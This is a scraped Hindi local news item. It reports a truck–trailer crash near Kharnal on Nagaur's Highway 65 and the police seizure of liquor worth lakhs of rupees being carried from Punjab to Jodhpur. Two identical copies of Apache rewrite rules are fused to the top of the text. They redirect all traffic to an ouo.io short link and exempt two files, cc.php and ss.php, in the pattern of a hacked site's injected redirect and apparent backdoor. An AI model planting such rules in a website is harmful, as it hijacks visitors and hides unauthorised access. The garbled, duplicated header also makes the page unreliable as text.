
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 306
Previous Nextनागौर। नागौर के हाइवे संख्या-65 पर खरनाल के पास कल देर रात एक ट्रक व ट्रेलर के बीच जबर्दस्त भिड़ंत हो गई। हादसे की सूचना मिलते ही सदर थाना पुलिस मौके पर पहुंची। पुलिस ने मौके पर जाकर ट्रक को हटाया तो उसमें से लाखों रुपए की शराब बरामद हुई। शराब के ट्रक को पंजाब से जोधपुर ले जाया जा रहा था। पुलिस ने ट्रक सहित शराब जब्त कर एक जने को गिरफ्तार किया है। हादसे के बाद कोतवाली थाना एसआई अनिल देव मौके पर पहुंचे और सदर थाने की टीम के साथ ट्रक की तलाशी ली तो उसमें शराब भरी हुई थी। पुलिस ने बताया कि ट्रक क्षतिग्रस्त होने के कारण रात को ट्रक को थाने नहीं लाया जा सका है। वहीं अस्पताल में भर्ती ट्रक चालक वीरेन्द्र को निगरानी में लिया गया। जब्त शराब अरुणाचल निर्मित बताई जा रही है जिसकी कीमत लाखों रुपए बताई जा रही है।